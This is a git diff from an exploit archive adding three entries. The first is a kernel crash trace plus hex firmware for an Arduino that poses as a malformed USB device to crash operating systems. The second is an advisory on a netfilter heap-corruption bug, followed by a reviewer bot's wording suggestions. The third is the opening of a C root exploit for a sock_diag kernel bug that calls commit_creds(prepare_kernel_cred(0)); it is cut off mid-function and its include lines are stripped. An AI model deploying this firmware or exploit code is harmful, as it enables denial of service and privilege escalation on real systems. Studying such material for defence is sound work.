+ +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1285326 +https://bugzilla.redhat.com/show_bug.cgi?id=1283350 + +Kernel Stacktrace: + +[ 622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint +descriptors, different from the interface descriptor's value: 0 +[ 622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003 +[ 622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 622.399416] usb 1-1: Product: Ä? +[ 622.404640] usb 1-1: Manufacturer: Ä? +[ 622.410079] usb 1-1: SerialNumber: % +[ 622.444650] BUG: unable to handle kernel NULL pointer dereference at +0000000000000002 +[ 622.445019] IP: [] aiptek_probe+0x463/0x658 [aiptek] +[ 622.445019] PGD 0 +[ 622.445019] Oops: 0000 [#1] SMP +[ 622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT +ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc +ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 +nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter +ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat +nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter +ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper +drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c +sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix +libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod +[ 622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000 +[ 622.445019] RIP: 0010:[] [] +aiptek_probe+0x463/0x658 [aiptek] +[ 622.445019] RSP: 0018:ffff88000f4cfb80 EFLAGS: 00010286 +[ 
622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800 +[ 622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000 +[ 622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000 +[ 622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800 +[ 622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834 +[ 622.445019] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 622.445019] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4: +00000000000006f0 +[ 622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 622.445019] Stack: +[ 622.445019] ffff88000bcd0800 0000000000000001 0000019000000246 +0000019000000032 +[ 622.445019] 0000006400000019 0000012c000000c8 000000000cc3e092 +ffff88000bcd0890 +[ 622.445019] ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0 +[ 622.445019] Call Trace: +[ 622.445019] [] usb_probe_interface+0x1c4/0x2f0 +[ 622.445019] [] driver_probe_device+0x87/0x390 +[ 622.445019] [] __driver_attach+0x93/0xa0 +[ 622.445019] [] ? __device_attach+0x40/0x40 +[ 622.445019] [] bus_for_each_dev+0x73/0xc0 +[ 622.445019] [] driver_attach+0x1e/0x20 +[ 622.445019] [] bus_add_driver+0x200/0x2d0 +[ 622.445019] [] driver_register+0x64/0xf0 +[ 622.445019] [] usb_register_driver+0x82/0x160 +[ 622.445019] [] ? 0xffffffffa0399fff +[ 622.445019] [] aiptek_driver_init+0x1e/0x1000 [aiptek] +[ 622.445019] [] do_one_initcall+0xb8/0x230 +[ 622.445019] [] load_module+0x133e/0x1b40 +[ 622.445019] [] ? ddebug_proc_write+0xf0/0xf0 +[ 622.445019] [] ? 
copy_module_from_fd.isra.42+0x53/0x150 +[ 622.445019] [] SyS_finit_module+0xa6/0xd0 +[ 622.445019] [] system_call_fastpath+0x16/0x1b +[ 622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7 +e8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f> +b6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00 +[ 622.445019] RIP [] aiptek_probe+0x463/0x658 [aiptek] +[ 622.445019] RSP +[ 622.445019] CR2: 0000000000000002 +[ 622.860772] ---[ end trace b239663354a1c556 ]--- +[ 622.864813] Kernel panic - not syncing: Fatal exception +[ 622.865768] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C2050C942D04CE +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940C02C3 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C50009030C0306 +:1000B000FF0203032D032D032D0310031403180364 +:1000C0001E0322032D0328030000000200080E0077 +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E0EDF3E102C005900D92A436B107D5 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9402070C940000089547 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E949F020E94C70060E06D +:1001B00083E00E942E0361E087E00E942E0361E04D +:1001C00088E00E942E030E9457067E012AE9E20E73 
+:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D +:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 
+:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B +:100500007C010E945602EB01C114D104E104F10404 +:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 +:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F +:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E 
+:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 +:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 +:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 +:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B 
+:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 +:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F +:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 +:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 
+:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE +:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 +:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 
+:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 +:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B +:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 
+:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C +:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:1014200000000040580403500001010203010902BA +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 +:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE 
+:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 +:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 +:101740000D0A005B44454255475D200953656E64B0 +:1017500020496E74657266616365204465736372C7 +:101760006970746F720928696E7465726661636569 +:101770003A2569292E2E2E0D0A005B444542554715 +:101780005D200953656E6420456E64706F696E74E8 +:101790002044657363726970746F720928656E64A2 +:1017A000706F696E743A2569292E2E2E0D0A005B22 +:1017B00044454255475D203C3C70616E6963206D35 +:1017C0006F64653F3E3E0D0A005B44454255475DF0 
+:1017D0002009203E3E20537472696E672044657371
+:1017E00063726970746F72207265717565737420AD
+:1017F0002D2073656E64696E67206D616C666F7213
+:101800006D656420737472696E67212073657475E9
+:10181000702E7756616C75654C203D3D2025690D15
+:101820000A005B48455844554D505D0A0D0025306F
+:04183000325820000A
+:00000001FF
diff --git a/platforms/linux/dos/39545.txt b/platforms/linux/dos/39545.txt
new file mode 100755
index 000000000..ee14922c4
--- /dev/null
+++ b/platforms/linux/dos/39545.txt
@@ -0,0 +1,23 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=758
+
+A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE ioctl in the netfilter code for iptables support. This ioctl is can be triggered by an unprivileged user on PF_INET sockets when unprivileged user namespaces are available (CONFIG_USER_NS=y). Android does not enable this option, but desktop/server distributions and Chrome OS will commonly enable this to allow for containers support or sandboxing.
+
+In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset:
+
+newpos = pos + e->next_offset;
+...
+e = (struct ipt_entry *) (entry0 + newpos);
+e->counters.pcnt = pos;
+
+This means that an out of bounds 32-bit write can occur in a 64kb range from the allocated heap entry, with a controlled offset and a partially controlled write value ("pos") or zero. The attached proof-of-concept (netfilter_setsockopt_v3.c) triggers the corruption multiple times to set adjacent heap structures to zero.
+
+This issue affects (at least) kernel versions 3.10, 3.18 and 4.4. It appears that a similar codepath is accessible via arp_tables.c/ARPT_SO_SET_REPLACE as well.
+
+Furthermore, a recent refactoring cof this codepath (https://github.com/torvalds/linux/commit/2e4e6a17af35be359cc8f1c924f8f198fbd478cc) introduced an integer overflow in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. The attached proof-of-concept (netfilter_setsockopt_v4.c) triggers this issue on 4.4.
+
+Correction: IPT_SO_SET_REPLACE is reached via setsockopt, not ioctl!
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39545.zip
+
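Review bot: The opening paragraph still calls IPT_SO_SET_REPLACE an ioctl although the later `Correction:` line says it is reached via setsockopt; the first sentence should read `A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE setsockopt in the netfilter code for iptables support.` and the correction line can then be dropped. Two typos in the same hunk: `This ioctl is can be triggered` should be `This setsockopt can be triggered`, and `a recent refactoring cof this codepath` should be `a recent refactoring of this codepath`. For triage it would also help to state up front the condition the text already implies, that the path is reachable without privilege only where `CONFIG_USER_NS=y` makes unprivileged user namespaces available.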
diff --git a/platforms/linux/local/33336.c b/platforms/linux/local/33336.c
new file mode 100755
index 000000000..8a6d85c37
--- /dev/null
+++ b/platforms/linux/local/33336.c
@@ -0,0 +1,164 @@
+/*
+* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
+* bug found by Spender
+* poc by SynQ
+*
+* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
+* using nl_table->hash.rehash_time, index 81
+*
+* Fedora 18 support added
+*
+* 2/2013
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+unsigned long sock_diag_handlers, nl_table;
+
+int __attribute__((regparm(3)))
+kernel_code()
+{
+ commit_creds(prepare_kernel_cred(0));
+ return -1;
+}
+
+int jump_payload_not_used(void *skb, void *nlh)
+{
+ asm volatile (
+ "mov $kernel_code, %eax\n"
+ "call *%eax\n"
+ );
+}
+
+unsigned long
+get_symbol(char *name)
+{
+ FILE *f;
+ unsigned long addr;
+ char dummy, sym[512];
+ int ret = 0;
+
+ f = fopen("/proc/kallsyms", "r");
+ if (!f) {
+ return 0;
+ }
+
+ while (ret != EOF) {
+ ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
+ if (ret == 0) {
+ fscanf(f, "%s\n", sym);
+ continue;
+ }
+ if (!strcmp(name, sym)) {
+ printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
+ fclose(f);
+ return addr;
+ }
+ }
+ fclose(f);
+
+ return 0;
+}
+
+int main(int argc, char*argv[])
+{
+ int fd;
+ unsigned family;
+ struct {
+ struct nlmsghdr nlh;
+ struct unix_diag_req r;
+ } req;
+ char buf[8192];
+
